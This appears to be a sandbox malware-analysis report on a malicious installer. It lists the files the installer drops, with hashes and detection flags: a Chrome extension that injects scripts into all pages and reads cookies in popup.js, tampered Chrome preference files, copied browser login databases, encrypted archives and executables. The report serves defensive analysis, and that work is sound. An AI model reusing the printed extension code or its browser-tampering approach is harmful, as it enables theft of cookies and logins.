                                                                                                                                          Preview: .PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O.*.!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B* ..dh)...l.:|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):93637
                                                                                                                                          Entropy (8bit):5.292996107428883
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                                                          MD5:E1288116312E4728F98923C79B034B67
                                                                                                                                          SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                                                          SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                                                          SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: /*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\manifest.json
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2380
                                                                                                                                          Entropy (8bit):5.687293760500434
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
                                                                                                                                          MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
                                                                                                                                          SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
                                                                                                                                          SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
                                                                                                                                          SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\popup.html
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):280
                                                                                                                                          Entropy (8bit):5.048307538221611
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
                                                                                                                                          MD5:E93B02D6CFFCCA037F3EA55DC70EE969
                                                                                                                                          SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
                                                                                                                                          SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
                                                                                                                                          SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\popup.js
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):642
                                                                                                                                          Entropy (8bit):4.985939227199713
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
                                                                                                                                          MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
                                                                                                                                          SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
                                                                                                                                          SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
                                                                                                                                          SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text, with very long lines
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):5468
                                                                                                                                          Entropy (8bit):5.1800878480421595
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:nq6CbKM/XwdVTcVPyk0JCKL8eGbOEQVuwv:nq6Cbh/gdVTcy4K7
                                                                                                                                          MD5:A90938265B6DF6F8D8007CF37C8A153C
                                                                                                                                          SHA1:54CFD3EEDE08050B1335C960CD291D7C515FEBBF
                                                                                                                                          SHA-256:751935F19D34C81BA1674BB9094520A50A7ACA9C76266D7C0DD53BAE374AA78E
                                                                                                                                          SHA-512:78ADE8BAE7AF44E2D67E59CED3D30F1CF72BA85A308FB83E2C87B7AF51E82A74DAAA7A3279D7B50FD457E3C85FC79ABB90EC8FEA71AD0BBA001EB5B6D45279D5
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245951485918895","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):34636
                                                                                                                                          Entropy (8bit):5.539252667637914
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:gEyODiUckPW/r+yqLlCL1kXqKf/pUZNCgVLH2Hf6rUQGAnLh/e:RAELlvAnw
                                                                                                                                          MD5:20852E36F67055E9F64A729268688E0C
                                                                                                                                          SHA1:292FCB85D375F7A6655DD38FE9D87C6ADB4451ED
                                                                                                                                          SHA-256:FA0B6CD58289D9C9EF23A0C5D952BC19620F5598E5B0F7CC519084E165642CBD
                                                                                                                                          SHA-512:EF107364C9F7563A84B886B59C18F4619CD27C3D62208B7EE329AA172F12E77D332B59DCE9F8DD79FB344D65906223C592ED501AC4D4A43B209F4C6D087E99E0
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: {"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245951492913444","lastpingday":"13245947458072931","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m
                                                                                                                                          C:\Users\user\AppData\Local\Login Data1611946677837
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40960
                                                                                                                                          Entropy (8bit):0.792852251086831
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Login Data1611946694087
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40960
                                                                                                                                          Entropy (8bit):0.792852251086831
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1611946680743
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:7-zip archive data, version 0.3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):37737
                                                                                                                                          Entropy (8bit):7.994967159065528
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
                                                                                                                                          MD5:5A6469A3F787ABD2AE93B47470528F79
                                                                                                                                          SHA1:4032B59237CC883FB752D9727971B435F4D27EB8
                                                                                                                                          SHA-256:1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
                                                                                                                                          SHA-512:335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n*.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\....*.f.q.=..t...).<|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....|..^.+RP]...D.jq.z'..4.|I*......jq..w.%..2/|.....>..y...>......C.)8B7$Z...{P.~..&...b..........
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1611946681946
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:7-zip archive data, version 0.3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):553040
                                                                                                                                          Entropy (8bit):7.999671101282436
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
                                                                                                                                          MD5:A4427F2F46DEEA15CEA87BDBB53A22CC
                                                                                                                                          SHA1:158501079514868D85246E970314A024FF263199
                                                                                                                                          SHA-256:18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
                                                                                                                                          SHA-512:334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A)*:..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.*Y..'*....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA*.2...O......|....Drrl)..7..9.....pNj.P6|].t .'.|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9
                                                                                                                                          C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          Process:C:\Users\user\Desktop\FileSetup-v17.04.41.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4592400
                                                                                                                                          Entropy (8bit):7.814257274870527
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:4u181qMJuVwd7Qld5ElgJQaQsPRT2KJLNx6DfgteKbeOJ:n294g7QxElWQaQyRTXy4vJ
                                                                                                                                          MD5:B7234E4A9AAAACEFA890535F8117C8FC
                                                                                                                                          SHA1:24C4321111FF004105C14E29662682F16900DE29
                                                                                                                                          SHA-256:A8FEFE8E1F92A30D1CDD4E2E2AFAACF08A02C8961F496EE16E89062417EC5F28
                                                                                                                                          SHA-512:8590BE6433943BEC0867A18247E25D9821D39DB1D06C6957D3895558EB5568DDDFF0B97ACDA222F0A16701C50DE43D8AD667D6717ADD6900EC941E71CA28E513
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 48%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                          Preview: MZ......................@..................................................L.!This program cannot be run in DOS mode....$.......P,...M.^.M.^.M.^...^.M.^3..^5M.^3..^OM.^.B.^.M.^.B.^.M.^.M.^3L.^.M.^.M.^3..^OO.^3..^/M.^3..^.M.^3..^.M.^Rich.M.^........................PE..L......V.................P...........M.......`....@..................................2.......................................8....... ..............`...#.......... d..................................@............`..|....6..@....................text....J.......P.................. ....rdata.......`.......`..............@..@.data...D....P.......P..............@....rsrc....... ......................@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe:Zone.Identifier
                                                                                                                                          Process:C:\Users\user\Desktop\FileSetup-v17.04.41.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):26
                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                          C:\Users\user\AppData\Local\Temp\MSI61C2.tmp
                                                                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):6656
                                                                                                                                          Entropy (8bit):5.2861874904617645
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
                                                                                                                                          MD5:84878B1A26F8544BDA4E069320AD8E7D
                                                                                                                                          SHA1:51C6EE244F5F2FA35B563BFFB91E37DA848A759C
                                                                                                                                          SHA-256:809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
                                                                                                                                          SHA-512:4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):268744
                                                                                                                                          Entropy (8bit):5.398284390686728
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
                                                                                                                                          MD5:E2E9483568DC53F68BE0B80C34FE27FB
                                                                                                                                          SHA1:8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
                                                                                                                                          SHA-256:205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
                                                                                                                                          SHA-512:B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 8%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):73160
                                                                                                                                          Entropy (8bit):6.49500452335621
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
                                                                                                                                          MD5:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                          SHA1:27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
                                                                                                                                          SHA-256:298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
                                                                                                                                          SHA-512:65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\atl71.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):89600
                                                                                                                                          Entropy (8bit):6.46929682960805
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
                                                                                                                                          MD5:79CB6457C81ADA9EB7F2087CE799AAA7
                                                                                                                                          SHA1:322DDDE439D9254182F5945BE8D97E9D897561AE
                                                                                                                                          SHA-256:A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
